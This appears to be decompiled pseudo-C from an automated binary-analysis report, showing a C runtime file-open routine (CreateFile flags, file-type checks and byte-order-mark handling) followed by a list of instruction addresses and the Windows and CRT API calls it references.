										__eflags = _t207 - _t337;
										if(_t207 < _t337) {
											goto L160;
										}
										__eflags = _t207 - _t410;
										if(_t207 > _t410) {
											goto L160;
										} else {
											_t411 = _t207 + 0x00000020 & 0x0000ffff;
										}
										L161:
										_t208 =  *_t342 & 0x0000ffff;
										__eflags = _t208 - _t337;
										if(_t208 >= _t337) {
											__eflags = _t208 - _v12;
											if(_t208 <= _v12) {
												_t210 = _t208 + 0x20;
												__eflags = _t210;
												_t208 = _t210 & 0x0000ffff;
											}
										}
										_t342 = _t342 + 2;
										_t405 = _t405 - 1;
										__eflags = _t405;
										if(_t405 != 0) {
											__eflags = _t411;
											if(_t411 != 0) {
												__eflags = _t411 - _t208;
												if(_t411 == _t208) {
													_t410 = 0x5a;
													continue;
												}
											}
										}
										_t204 = (_t411 & 0x0000ffff) - (_t208 & 0x0000ffff);
										goto L169;
										L160:
										_t411 = _t207;
										goto L161;
									}
								}
							} else {
								L153:
								 *(L00437D6A(__eflags)) = 0x16;
								E00439520();
								_t204 = 0x7fffffff;
							}
						}
					}
					L169:
					return _t204;
				} else {
					_t344 = _a16;
					if((0x00008000 & _t344) == 0 && ((_t344 & 0x00074000) != 0 || _v36 != 0x8000)) {
						_v5 = _v5 | 0x00000080;
					}
					_t215 = (_t344 & 0x00000003) - _t336;
					if(_t215 == 0) {
						_t406 = 0x80000000;
						goto L18;
					} else {
						_t329 = _t215 - 1;
						if(_t329 == 0) {
							__eflags = _t344 & 0x00000008;
							if((_t344 & 0x00000008) == 0) {
								L16:
								_t406 = 0x40000000;
								goto L18;
							} else {
								__eflags = _t344 & 0x00070000;
								if((_t344 & 0x00070000) == 0) {
									goto L16;
								} else {
									_t406 = 0xc0000000;
									_v12 = 0xc0000000;
								}
							}
							goto L19;
						} else {
							_t440 = _t329 == 1;
							if(_t329 == 1) {
								_t406 = 0xc0000000;
								L18:
								_v12 = _t406;
								L19:
								_push(_t409);
								_t413 = 0x10;
								_t389 = 2;
								_v44 = _t389;
								_t217 = _a20 - _t413;
								__eflags = _t217;
								if(_t217 == 0) {
									_v16 = _t336;
									goto L29;
								} else {
									_t324 = _t217 - _t413;
									__eflags = _t324;
									if(_t324 == 0) {
										_v16 = 1;
										goto L29;
									} else {
										_t325 = _t324 - _t413;
										__eflags = _t325;
										if(_t325 == 0) {
											_v16 = _t389;
											goto L29;
										} else {
											_t326 = _t325 - _t413;
											__eflags = _t326;
											if(_t326 == 0) {
												_v16 = 3;
												goto L29;
											} else {
												_t327 = _t326 - 0x40;
												__eflags = _t327;
												if(__eflags != 0) {
													L42:
													 *(L00437D36(__eflags)) = _t336;
													 *_a8 =  *_a8 | 0xffffffff;
													_t322 = L00437D6A(__eflags);
													_t336 = 0x16;
													 *_t322 = _t336;
													E00439520();
													goto L148;
												} else {
													__eflags = _t406 - 0x80000000;
													_v16 = _t327 & 0xffffff00 | _t406 == 0x80000000;
													L29:
													_t219 = _t344 & 0x00000700;
													__eflags = _t219 - 0x400;
													if(__eflags > 0) {
														__eflags = _t219 - 0x500;
														if(_t219 == 0x500) {
															L44:
															_t416 = 1;
															__eflags = 1;
															goto L45;
														} else {
															__eflags = _t219 - 0x600;
															if(_t219 == 0x600) {
																goto L43;
															} else {
																__eflags = _t219 - 0x700;
																if(__eflags == 0) {
																	goto L44;
																} else {
																	goto L42;
																}
															}
														}
													} else {
														if(__eflags == 0) {
															L37:
															_push(3);
															goto L38;
														} else {
															__eflags = _t219;
															if(_t219 == 0) {
																goto L37;
															} else {
																__eflags = _t219 - 0x100;
																if(_t219 == 0x100) {
																	_push(4);
																	goto L38;
																} else {
																	__eflags = _t219 - 0x200;
																	if(_t219 == 0x200) {
																		L43:
																		_push(5);
																		L38:
																		_pop(_t416);
																		goto L45;
																	} else {
																		__eflags = _t219 - 0x300;
																		if(__eflags != 0) {
																			goto L42;
																		} else {
																			_t416 = _t389;
																			L45:
																			_t390 = 0x80;
																			_t220 = _t336;
																			_v28 = 0x80;
																			_v20 = _t220;
																			__eflags = _t344 & 0x00000100;
																			if((_t344 & 0x00000100) != 0) {
																				_t317 =  *0x46bab0; // 0x0
																				__eflags =  !_t317 & _a24;
																				_t220 = _t336;
																				if(( !_t317 & _a24) >= 0) {
																					_t390 = 1;
																					__eflags = 1;
																					_v28 = 1;
																				}
																			}
																			__eflags = _t344 & 0x00000040;
																			if((_t344 & 0x00000040) != 0) {
																				_t406 = _t406 | 0x00010000;
																				_t46 =  &_v16;
																				 *_t46 = _v16 | 0x00000004;
																				__eflags =  *_t46;
																				_t220 = 0x4000000;
																				_v20 = 0x4000000;
																				_v12 = _t406;
																			}
																			__eflags = _t344 & 0x00001000;
																			if((_t344 & 0x00001000) != 0) {
																				_t390 = _t390 | 0x00000100;
																				__eflags = _t390;
																				_v28 = _t390;
																			}
																			__eflags = _t344 & 0x00002000;
																			if((_t344 & 0x00002000) != 0) {
																				_t220 = _t220 | 0x02000000;
																				__eflags = _t220;
																				_v20 = _t220;
																			}
																			__eflags = _t344 & 0x00000020;
																			if(__eflags == 0) {
																				__eflags = _t344 & 0x00000010;
																				if(__eflags != 0) {
																					_t316 = _t220 | 0x10000000;
																					__eflags = _t316;
																					goto L58;
																				}
																			} else {
																				_t316 = _t220 | 0x08000000;
																				L58:
																				_v20 = _t316;
																			}
																			_t221 = E004446EB(_t336, _t390, _t406, _t416, __eflags);
																			_t407 = _a8;
																			 *_t407 = _t221;
																			__eflags = _t221 - 0xffffffff;
																			if(__eflags != 0) {
																				 *_a4 = 1;
																				_t224 = E0044969C(__eflags, _a12, _v12, _v16,  &_v60, _t416, _v28, _v20); // executed
																				_t429 = _t427 + 0x1c;
																				_v32 = _t224;
																				__eflags = _t224 - 0xffffffff;
																				if(_t224 != 0xffffffff) {
																					L70:
																					_t225 = GetFileType(_t224); // executed
																					__eflags = _t225;
																					if(_t225 != 0) {
																						__eflags = _t225 - 2;
																						if(_t225 != 2) {
																							__eflags = _t225 - 3;
																							if(_t225 == 3) {
																								_t96 =  &_v5;
																								 *_t96 = _v5 | 0x00000008;
																								__eflags =  *_t96;
																							}
																						} else {
																							_v5 = _v5 | 0x00000040;
																						}
																						E0044497D(_t416,  *_t407, _v32);
																						_t392 = _v5 | 0x00000001;
																						 *( *((intOrPtr*)(0x46c2a0 + ( *_t407 >> 5) * 4)) + (( *_t407 & 0x0000001f) << 6) + 4) = _t392;
																						_v5 = _t392;
																						 *( *((intOrPtr*)(0x46c2a0 + ( *_t407 >> 5) * 4)) + (( *_t407 & 0x0000001f) << 6) + 0x24) =  *( *((intOrPtr*)(0x46c2a0 + ( *_t407 >> 5) * 4)) + (( *_t407 & 0x0000001f) << 6) + 0x24) & 0x00000080;
																						_t353 = _a16;
																						_t234 = _t392 & 0x00000048;
																						__eflags = _t234;
																						_v7 = _t234;
																						if(_t234 != 0) {
																							L88:
																							__eflags = _t392;
																							if(_t392 >= 0) {
																								goto L140;
																							} else {
																								__eflags = _t353 & 0x00074000;
																								if((_t353 & 0x00074000) == 0) {
																									_t290 = _v36 & 0x00074000;
																									__eflags = _t290;
																									if(_t290 != 0) {
																										_t353 = _t353 | _t290;
																										__eflags = _t353;
																									} else {
																										_t353 = _t353 | 0x00004000;
																									}
																									_a16 = _t353;
																								}
																								_t261 = _t353 & 0x00074000;
																								__eflags = _t261 - 0x4000;
																								if(_t261 == 0x4000) {
																									_v6 = _t336;
																								} else {
																									__eflags = _t261 - 0x10000;
																									if(_t261 == 0x10000) {
																										L102:
																										__eflags = (_t353 & 0x00000301) - 0x301;
																										if((_t353 & 0x00000301) == 0x301) {
																											goto L103;
																										}
																									} else {
																										__eflags = _t261 - 0x14000;
																										if(_t261 == 0x14000) {
																											goto L102;
																										} else {
																											__eflags = _t261 - 0x20000;
																											if(_t261 == 0x20000) {
																												L103:
																												_v6 = 2;
																											} else {
																												__eflags = _t261 - 0x24000;
																												if(_t261 == 0x24000) {
																													goto L103;
																												} else {
																													__eflags = _t261 - 0x40000;
																													if(_t261 == 0x40000) {
																														L101:
																														_v6 = 1;
																													} else {
																														__eflags = _t261 - 0x44000;
																														if(_t261 == 0x44000) {
																															goto L101;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								__eflags = _t353 & 0x00070000;
																								if((_t353 & 0x00070000) == 0) {
																									goto L140;
																								} else {
																									_v24 = _t336;
																									__eflags = _t392 & 0x00000040;
																									if((_t392 & 0x00000040) != 0) {
																										goto L140;
																									} else {
																										_t263 = _v12 & 0xc0000000;
																										__eflags = _t263 - 0x40000000;
																										if(_t263 == 0x40000000) {
																											__eflags = _t416;
																											if(_t416 == 0) {
																												goto L140;
																											} else {
																												_t372 = 2;
																												__eflags = _t416 - 0xc0000000;
																												if(_t416 <= 0xc0000000) {
																													goto L134;
																												} else {
																													__eflags = _t416 - 4;
																													if(__eflags > 0) {
																														goto L113;
																													} else {
																														_t273 = L0043AB3C(_t372, __eflags,  *_t407, _t336, _t336, 0xc0000000);
																														_t429 = _t429 + 0x10;
																														__eflags = _t273 | _t392;
																														if(__eflags == 0) {
																															goto L133;
																														} else {
																															goto L131;
																														}
																													}
																												}
																											}
																										} else {
																											__eflags = _t263 - 0x80000000;
																											if(_t263 == 0x80000000) {
																												L117:
																												_push(3);
																												_push( &_v24);
																												_push( *_t407);
																												_t278 = E00443330();
																												_t429 = _t429 + 0xc;
																												__eflags = _t278 - 0xffffffff;
																												if(__eflags == 0) {
																													goto L82;
																												} else {
																													_t372 = _v24;
																													_t392 = 2;
																													__eflags = _t278 - _t392;
																													if(_t278 == _t392) {
																														L122:
																														_t372 = _t372 & 0x0000ffff;
																														__eflags = _t372 - 0xfffe;
																														if(__eflags != 0) {
																															__eflags = _t372 - 0xfeff;
																															if(__eflags != 0) {
																																goto L131;
																															} else {
																																_t279 = L0043AB3C(_t372, __eflags,  *_t407, _t392, _t336, _t336);
																																_t429 = _t429 + 0x10;
																																__eflags = (_t279 & _t392) - 0xffffffff;
																																if(__eflags == 0) {
																																	goto L82;
																																} else {
																																	_v6 = 2;
																																	goto L140;
																																}
																															}
																														} else {
																															E00439649(__eflags,  *_t407);
																															_t282 = L00437D6A(__eflags);
																															_t336 = 0x16;
																															 *_t282 = _t336;
																														}
																													} else {
																														__eflags = _t278 - 3;
																														if(__eflags != 0) {
																															L131:
																															_t275 = L0043AB3C(_t372, __eflags,  *_t407, _t336, _t336, _t336);
																															_t429 = _t429 + 0x10;
																															__eflags = (_t275 & _t392) - 0xffffffff;
																															if(__eflags != 0) {
																																goto L140;
																															} else {
																																goto L82;
																															}
																														} else {
																															__eflags = _t372 - 0xbfbbef;
																															if(_t372 != 0xbfbbef) {
																																goto L122;
																															} else {
																																_v6 = 1;
																																goto L140;
																															}
																														}
																													}
																												}
																											} else {
																												__eflags = _t263 - 0xc0000000;
																												if(_t263 != 0xc0000000) {
																													goto L140;
																												} else {
																													__eflags = _t416;
																													if(_t416 == 0) {
																														goto L140;
																													} else {
																														_t372 = 2;
																														__eflags = _t416 - 0xc0000000;
																														if(_t416 <= 0xc0000000) {
																															L134:
																															_t423 = _t336;
																															_t265 = _v6 - 1;
																															__eflags = _t265;
																															if(__eflags == 0) {
																																_t372 = 3;
																																_v24 = 0xbfbbef;
																																_v44 = _t372;
																																goto L138;
																															} else {
																																__eflags = _t265 - 1;
																																if(__eflags != 0) {
																																	goto L140;
																																} else {
																																	_v24 = 0xfeff;
																																	while(1) {
																																		L138:
																																		_push(_t372 - _t423);
																																		_push( &_v24 + _t423);
																																		_push( *_t407);
																																		_t270 = E004397F9(_t336, _t392, _t407, _t423, __eflags);
																																		_t429 = _t429 + 0xc;
																																		__eflags = _t270 - 0xffffffff;
																																		if(__eflags == 0) {
																																			goto L82;
																																		}
																																		_t372 = _v44;
																																		_t423 = _t423 + _t270;
																																		__eflags = _t372 - _t423;
																																		if(__eflags > 0) {
																																			continue;
																																		} else {
																																			goto L140;
																																		}
																																		goto L148;
																																	}
																																	goto L82;
																																}
																															}
																														} else {
																															__eflags = _t416 - 4;
																															if(__eflags <= 0) {
																																_t283 = L0043AB3C(_t372, __eflags,  *_t407, _t336, _t336, 0xc0000000);
																																_t429 = _t429 + 0x10;
																																__eflags = _t283 | _t392;
																																if(__eflags == 0) {
																																	L133:
																																	_t372 = 2;
																																	goto L134;
																																} else {
																																	_t285 = L0043AB3C(_t372, __eflags,  *_t407, _t336, _t336, _t336);
																																	_t429 = _t429 + 0x10;
																																	__eflags = (_t285 & _t392) - 0xffffffff;
																																	if(__eflags == 0) {
																																		goto L82;
																																	} else {
																																		goto L117;
																																	}
																																}
																															} else {
																																L113:
																																__eflags = _t416 - 5;
																																if(_t416 == 5) {
																																	goto L134;
																																} else {
																																	goto L140;
																																}
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						} else {
																							__eflags = _t392;
																							if(_t392 >= 0) {
																								L140:
																								 *( *((intOrPtr*)(0x46c2a0 + ( *_t407 >> 5) * 4)) + (( *_t407 & 0x0000001f) << 6) + 0x24) =  *( *((intOrPtr*)(0x46c2a0 + ( *_t407 >> 5) * 4)) + (( *_t407 & 0x0000001f) << 6) + 0x24) ^ ( *( *((intOrPtr*)(0x46c2a0 + ( *_t407 >> 5) * 4)) + (( *_t407 & 0x0000001f) << 6) + 0x24) ^ _v6) & 0x0000007f;
																								 *( *((intOrPtr*)(0x46c2a0 + ( *_t407 >> 5) * 4)) + (( *_t407 & 0x0000001f) << 6) + 0x24) = _a16 >> 0x00000010 << 0x00000007 |  *( *((intOrPtr*)(0x46c2a0 + ( *_t407 >> 5) * 4)) + (( *_t407 & 0x0000001f) << 6) + 0x24) & 0x0000007f;
																								_t359 = _a16;
																								__eflags = _v7 - _t336;
																								if(_v7 == _t336) {
																									__eflags = _t359 & 0x00000008;
																									if((_t359 & 0x00000008) != 0) {
																										_t368 =  *_t407;
																										_t259 =  *((intOrPtr*)(0x46c2a0 + (_t368 >> 5) * 4));
																										_t370 = (_t368 & 0x0000001f) << 6;
																										_t169 = _t259 + _t370 + 4;
																										 *_t169 =  *(_t259 + _t370 + 4) | 0x00000020;
																										__eflags =  *_t169;
																										_t359 = _a16;
																									}
																								}
																								_t420 = _v12;
																								__eflags = (_t420 & 0xc0000000) - 0xc0000000;
																								if((_t420 & 0xc0000000) == 0xc0000000) {
																									__eflags = _t359 & 0x00000001;
																									if(__eflags != 0) {
																										CloseHandle(_v32);
																										_t249 = E0044969C(__eflags, _a12, _t420 & 0x7fffffff, _v16,  &_v60, 3, _v28, _v20);
																										__eflags = _t249 - 0xffffffff;
																										if(_t249 != 0xffffffff) {
																											_t398 =  *_t407;
																											_t400 = (_t398 & 0x0000001f) << 6;
																											__eflags = _t400;
																											 *((intOrPtr*)(_t400 +  *((intOrPtr*)(0x46c2a0 + (_t398 >> 5) * 4)))) = _t249;
																										} else {
																											L00437D49(GetLastError());
																											 *( *((intOrPtr*)(0x46c2a0 + ( *_t407 >> 5) * 4)) + (( *_t407 & 0x0000001f) << 6) + 4) =  *( *((intOrPtr*)(0x46c2a0 + ( *_t407 >> 5) * 4)) + (( *_t407 & 0x0000001f) << 6) + 4) & 0x000000fe;
																											E00444890( *_t407);
																											goto L68;
																										}
																									}
																								}
																							} else {
																								__eflags = _t353 & 0x00000002;
																								if(__eflags == 0) {
																									goto L88;
																								} else {
																									_t291 = L0043AB3C(_t353, __eflags,  *_t407, 0xffffffff, 0xffffffff, 2);
																									_t375 = _t291 & _t392;
																									_t429 = _t429 + 0x10;
																									_v48 = _t291;
																									_v24 = _t392;
																									__eflags = (_t291 & _t392) - 0xffffffff;
																									if(__eflags != 0) {
																										_push(1);
																										_push( &_v40);
																										_push( *_t407);
																										_v40 = _t336;
																										_t293 = E00443330();
																										_t431 = _t429 + 0xc;
																										__eflags = _t293;
																										if(__eflags != 0) {
																											L86:
																											_t294 = L0043AB3C(_t375, __eflags,  *_t407, _t336, _t336, _t336);
																											_t429 = _t431 + 0x10;
																											__eflags = (_t294 & _t392) - 0xffffffff;
																											if(__eflags == 0) {
																												goto L82;
																											} else {
																												goto L87;
																											}
																										} else {
																											__eflags = _v40 - 0x1a;
																											if(__eflags != 0) {
																												goto L86;
																											} else {
																												_t296 = E0044C3FA(_t375, _t392, __eflags,  *_t407, _v48, _v24);
																												_t431 = _t431 + 0xc;
																												__eflags = _t296 - 0xffffffff;
																												if(__eflags == 0) {
																													goto L82;
																												} else {
																													goto L86;
																												}
																											}
																										}
																									} else {
																										__eflags =  *(L00437D36(__eflags)) - 0x83;
																										if(__eflags == 0) {
																											L87:
																											_t392 = _v5;
																											_t353 = _a16;
																											goto L88;
																										} else {
																											L82:
																											E00439649(__eflags,  *_t407);
																											goto L68;
																										}
																									}
																								}
																							}
																						}
																					} else {
																						 *( *((intOrPtr*)(0x46c2a0 + ( *_t407 >> 5) * 4)) + (( *_t407 & 0x0000001f) << 6) + 4) =  *( *((intOrPtr*)(0x46c2a0 + ( *_t407 >> 5) * 4)) + (( *_t407 & 0x0000001f) << 6) + 4) & 0x000000fe;
																						_t424 = GetLastError();
																						L00437D49(_t424);
																						CloseHandle(_v32);
																						__eflags = _t424;
																						if(__eflags == 0) {
																							 *(L00437D6A(__eflags)) = 0xd;
																						}
																						goto L69;
																					}
																				} else {
																					_t380 = _v12;
																					__eflags = (_t380 & 0xc0000000) - 0xc0000000;
																					if((_t380 & 0xc0000000) != 0xc0000000) {
																						L67:
																						_t381 =  *_t407;
																						_t309 =  *((intOrPtr*)(0x46c2a0 + (_t381 >> 5) * 4));
																						_t383 = (_t381 & 0x0000001f) << 6;
																						_t83 = _t309 + _t383 + 4;
																						 *_t83 =  *(_t309 + _t383 + 4) & 0x000000fe;
																						__eflags =  *_t83;
																						L00437D49(GetLastError());
																						L68:
																						L69:
																						_t336 =  *(L00437D6A(__eflags));
																					} else {
																						__eflags = _a16 & 0x00000001;
																						if(__eflags == 0) {
																							goto L67;
																						} else {
																							_v12 = _t380 & 0x7fffffff;
																							_t224 = E0044969C(__eflags, _a12, _t380 & 0x7fffffff, _v16,  &_v60, _t416, _v28, _v20);
																							_t429 = _t429 + 0x1c;
																							_v32 = _t224;
																							__eflags = _t224 - 0xffffffff;
																							if(_t224 != 0xffffffff) {
																								goto L70;
																							} else {
																								goto L67;
																							}
																						}
																					}
																				}
																				L148:
																				_t246 = _t336;
																			} else {
																				 *(L00437D36(__eflags)) = _t336;
																				 *_t407 =  *_t407 | 0xffffffff;
																				__eflags =  *_t407;
																				 *(L00437D6A(__eflags)) = 0x18;
																				_t246 =  *(L00437D6A(__eflags));
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							} else {
								 *(L00437D36(_t440)) = _t336;
								 *_a8 =  *_a8 | 0xffffffff;
								_t333 = L00437D6A(_t440);
								_t340 = 0x16;
								 *_t333 = _t340;
								E00439520();
								_t246 = _t340;
							}
						}
					}
					return _t246;
				}
			}

0x0044972d
0x00449733
0x00449734
0x0044973b
0x0044973e
0x00449741
0x00449748
0x0044974b
0x00449756
0x0044975d
0x0044974d
0x0044974d
0x00449750
0x00449750
0x00449764
0x00449769
0x0044976c
0x00449e73
0x00449e74
0x00449e75
0x00449e76
0x00449e77
0x00449e78
0x00449e7d
0x00449e82
0x00449e89
0x00449e8a
0x00449f27
0x00449e90
0x00449e90
0x00449e93
0x00449e95
0x00449e97
0x00449e9d
0x00449ea0
0x00449ea2
0x00449ebb
0x00449ebe
0x00449ec0
0x00000000
0x00449ec2
0x00449ec2
0x00449ec3
0x00449ec6
0x00449ec9
0x00449eca
0x00449ecc
0x00449ed4
0x00449ed4
0x00449ed8
0x00449edb
0x00000000
0x00000000
0x00449edd
0x00449ee0
0x00000000
0x00449ee2
0x00449ee5
0x00449ee5
0x00449eec
0x00449eec
0x00449eef
0x00449ef2
0x00449ef4
0x00449ef8
0x00449efa
0x00449efa
0x00449efd
0x00449efd
0x00449ef8
0x00449f00
0x00449f03
0x00449f03
0x00449f04
0x00449f06
0x00449f09
0x00449f0b
0x00449f0e
0x00449ed3
0x00000000
0x00449ed3
0x00449f0e
0x00449f09
0x00449f17
0x00000000
0x00449eea
0x00449eea
0x00000000
0x00449eea
0x00449ed4
0x00449ea4
0x00449ea4
0x00449ea9
0x00449eaf
0x00449eb4
0x00449eb4
0x00449ea2
0x00449e97
0x00449f2f
0x00449f31
0x00449772
0x00449772
0x0044977c
0x0044978b
0x0044978b
0x00449799
0x0044979b
0x004497e5
0x00000000
0x0044979d
0x0044979d
0x0044979e
0x004497ca
0x004497cd
0x004497de
0x004497de
0x00000000
0x004497cf
0x004497cf
0x004497d5
0x00000000
0x004497d7
0x004497d7
0x004497d9
0x004497d9
0x004497d5
0x00000000
0x004497a0
0x004497a0
0x004497a1
0x004497c6
0x004497ea
0x004497ea
0x004497ed
0x004497f0
0x004497f3
0x004497f6
0x004497f7
0x004497fa
0x004497fa
0x004497fc
0x00449834
0x00000000
0x004497fe
0x004497fe
0x004497fe
0x00449800
0x0044982b
0x00000000
0x00449802
0x00449802
0x00449802
0x00449804
0x00449826
0x00000000
0x00449806
0x00449806
0x00449806
0x00449808
0x0044981d
0x00000000
0x0044980a
0x0044980a
0x0044980a
0x0044980d
0x00449884
0x00449889
0x0044988e
0x00449891
0x00449898
0x00449899
0x0044989b
0x00000000
0x0044980f
0x0044980f
0x00449818
0x00449837
0x00449839
0x00449843
0x00449845
0x0044986f
0x00449874
0x004498a9
0x004498ab
0x004498ab
0x00000000
0x00449876
0x00449876
0x0044987b
0x00000000
0x0044987d
0x0044987d
0x00449882
0x00000000
0x00000000
0x00000000
0x00000000
0x00449882
0x0044987b
0x00449847
0x00449847
0x0044986a
0x0044986a
0x00000000
0x00449849
0x00449849
0x0044984b
0x00000000
0x0044984d
0x0044984d
0x00449852
0x00449866
0x00000000
0x00449854
0x00449854
0x00449859
0x004498a5
0x004498a5
0x0044986c
0x0044986c
0x00000000
0x0044985b
0x0044985b
0x00449860
0x00000000
0x00449862
0x00449862
0x004498ac
0x004498ac
0x004498b1
0x004498b3
0x004498b6
0x004498b9
0x004498bf
0x004498c1
0x004498cb
0x004498cd
0x004498cf
0x004498d3
0x004498d3
0x004498d4
0x004498d4
0x004498cf
0x004498d7
0x004498da
0x004498dc
0x004498e2
0x004498e2
0x004498e2
0x004498e6
0x004498eb
0x004498ee
0x004498ee
0x004498f1
0x004498f7
0x004498f9
0x004498f9
0x004498ff
0x004498ff
0x00449902
0x00449908
0x0044990a
0x0044990a
0x0044990f
0x0044990f
0x00449912
0x00449915
0x0044991e
0x00449921
0x00449923
0x00449923
0x00000000
0x00449923
0x00449917
0x00449917
0x00449928
0x00449928
0x00449928
0x0044992b
0x00449930
0x00449933
0x00449935
0x00449938
0x00449964
0x00449978
0x0044997d
0x00449980
0x00449983
0x00449986
0x004499fb
0x004499fc
0x00449a02
0x00449a04
0x00449a48
0x00449a4b
0x00449a53
0x00449a56
0x00449a58
0x00449a58
0x00449a58
0x00449a58
0x00449a4d
0x00449a4d
0x00449a4d
0x00449a61
0x00449a7f
0x00449a82
0x00449a9a
0x00449a9d
0x00449aa2
0x00449aa7
0x00449aa7
0x00449aa9
0x00449aac
0x00449b48
0x00449b48
0x00449b4a
0x00000000
0x00449b50
0x00449b50
0x00449b56
0x00449b5b
0x00449b5b
0x00449b60
0x00449b6a
0x00449b6a
0x00449b62
0x00449b62
0x00449b62
0x00449b6c
0x00449b6c
0x00449b71
0x00449b76
0x00449b7b
0x00449bc1
0x00449b7d
0x00449b7d
0x00449b82
0x00449bad
0x00449bb4
0x00449bb9
0x00000000
0x00000000
0x00449b84
0x00449b84
0x00449b89
0x00000000
0x00449b8b
0x00449b8b
0x00449b90
0x00449bbb
0x00449bbb
0x00449b92
0x00449b92
0x00449b97
0x00000000
0x00449b99
0x00449b99
0x00449b9e
0x00449ba7
0x00449ba7
0x00449ba0
0x00449ba0
0x00449ba5
0x00000000
0x00000000
0x00449ba5
0x00449b9e
0x00449b97
0x00449b90
0x00449b89
0x00449b82
0x00449bc4
0x00449bca
0x00000000
0x00449bd0
0x00449bd0
0x00449bd3
0x00449bd6
0x00000000
0x00449bdc
0x00449be4
0x00449be6
0x00449beb
0x00449cde
0x00449ce0
0x00000000
0x00449ce6
0x00449ce8
0x00449ce9
0x00449ceb
0x00000000
0x00449ced
0x00449ced
0x00449cf0
0x00000000
0x00449cf6
0x00449cfb
0x00449d00
0x00449d03
0x00449d05
0x00000000
0x00000000
0x00000000
0x00000000
0x00449d05
0x00449cf0
0x00449ceb
0x00449bf1
0x00449bf1
0x00449bf6
0x00449c53
0x00449c53
0x00449c58
0x00449c59
0x00449c5b
0x00449c60
0x00449c63
0x00449c66
0x00000000
0x00449c6c
0x00449c6c
0x00449c71
0x00449c72
0x00449c74
0x00449c90
0x00449c90
0x00449c96
0x00449c9c
0x00449cb5
0x00449cbb
0x00000000
0x00449cbd
0x00449cc2
0x00449cc9
0x00449ccc
0x00449ccf
0x00000000
0x00449cd5
0x00449cd5
0x00000000
0x00449cd5
0x00449ccf
0x00449c9e
0x00449ca0
0x00449ca6
0x00449cad
0x00449cae
0x00449cae
0x00449c76
0x00449c76
0x00449c79
0x00449d07
0x00449d0c
0x00449d13
0x00449d16
0x00449d19
0x00000000
0x00449d1b
0x00000000
0x00449d1b
0x00449c7f
0x00449c7f
0x00449c85
0x00000000
0x00449c87
0x00449c87
0x00000000
0x00449c87
0x00449c85
0x00449c79
0x00449c74
0x00449bf8
0x00449bf8
0x00449bfa
0x00000000
0x00449c00
0x00449c00
0x00449c02
0x00000000
0x00449c08
0x00449c0a
0x00449c0b
0x00449c0d
0x00449d23
0x00449d27
0x00449d29
0x00449d29
0x00449d2a
0x00449d3a
0x00449d3b
0x00449d42
0x00000000
0x00449d2c
0x00449d2c
0x00449d2d
0x00000000
0x00449d2f
0x00449d2f
0x00449d45
0x00449d45
0x00449d49
0x00449d4f
0x00449d50
0x00449d52
0x00449d57
0x00449d5a
0x00449d5d
0x00000000
0x00000000
0x00449d63
0x00449d66
0x00449d68
0x00449d6a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00449d6a
0x00000000
0x00449d45
0x00449d2d
0x00449c13
0x00449c13
0x00449c16
0x00449c2b
0x00449c30
0x00449c33
0x00449c35
0x00449d20
0x00449d22
0x00000000
0x00449c3b
0x00449c40
0x00449c47
0x00449c4a
0x00449c4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00449c4d
0x00449c18
0x00449c18
0x00449c18
0x00449c1b
0x00000000
0x00449c21
0x00000000
0x00449c21
0x00449c1b
0x00449c16
0x00449c0d
0x00449c02
0x00449bfa
0x00449bf6
0x00449beb
0x00449bd6
0x00449bca
0x00449ab2
0x00449ab2
0x00449ab4
0x00449d6c
0x00449d89
0x00449db2
0x00449db6
0x00449db9
0x00449dbc
0x00449dbe
0x00449dc1
0x00449dc3
0x00449dcd
0x00449dd4
0x00449dd7
0x00449dd7
0x00449dd7
0x00449ddc
0x00449ddc
0x00449dc1
0x00449ddf
0x00449deb
0x00449ded
0x00449def
0x00449df2
0x00449df7
0x00449e16
0x00449e1e
0x00449e21
0x00449e55
0x00449e66
0x00449e66
0x00449e69
0x00449e23
0x00449e2a
0x00449e43
0x00449e4a
0x00000000
0x00449e4f
0x00449e21
0x00449df2
0x00449aba
0x00449aba
0x00449abd
0x00000000
0x00449ac3
0x00449acb
0x00449ad2
0x00449ad4
0x00449ad7
0x00449ada
0x00449add
0x00449ae0
0x00449afb
0x00449b00
0x00449b01
0x00449b03
0x00449b06
0x00449b0b
0x00449b0e
0x00449b10
0x00449b2e
0x00449b33
0x00449b3a
0x00449b3d
0x00449b40
0x00000000
0x00000000
0x00000000
0x00000000
0x00449b12
0x00449b12
0x00449b17
0x00000000
0x00449b19
0x00449b21
0x00449b26
0x00449b29
0x00449b2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00449b2c
0x00449b17
0x00449ae2
0x00449ae7
0x00449aed
0x00449b42
0x00449b42
0x00449b45
0x00000000
0x00449aef
0x00449aef
0x00449af1
0x00000000
0x00449af1
0x00449aed
0x00449ae0
0x00449abd
0x00449ab4
0x00449a06
0x00449a1a
0x00449a25
0x00449a28
0x00449a31
0x00449a37
0x00449a39
0x00449a40
0x00449a40
0x00000000
0x00449a39
0x00449988
0x00449988
0x00449994
0x00449996
0x004499c9
0x004499c9
0x004499d3
0x004499da
0x004499dd
0x004499dd
0x004499dd
0x004499e9
0x004499ee
0x004499ef
0x004499f4
0x00449998
0x00449998
0x0044999c
0x00000000
0x0044999e
0x004499b2
0x004499b9
0x004499be
0x004499c1
0x004499c4
0x004499c7
0x00000000
0x00000000
0x00000000
0x00000000
0x004499c7
0x0044999c
0x00449996
0x00449e6c
0x00449e6c
0x0044993a
0x0044993f
0x00449941
0x00449941
0x00449949
0x00449954
0x00449954
0x00449938
0x00449860
0x00449859
0x00449852
0x0044984b
0x00449847
0x00449845
0x0044980d
0x00449808
0x00449804
0x00449800
0x004497a3
0x004497a8
0x004497ad
0x004497b0
0x004497b7
0x004497b8
0x004497ba
0x004497bf
0x004497bf
0x004497a1
0x0044979e
0x0044995a
0x0044995a

APIs

___createFile.LIBCMT ref: 00449978
___createFile.LIBCMT ref: 004499B9
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004499E2
__dosmaperr.LIBCMT ref: 004499E9
GetFileType.KERNELBASE(00000000), ref: 004499FC
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00449A1F
__dosmaperr.LIBCMT ref: 00449A28
CloseHandle.KERNEL32(00000000), ref: 00449A31
__set_osfhnd.LIBCMT ref: 00449A61
__lseeki64_nolock.LIBCMT ref: 00449ACB
__close_nolock.LIBCMT ref: 00449AF1
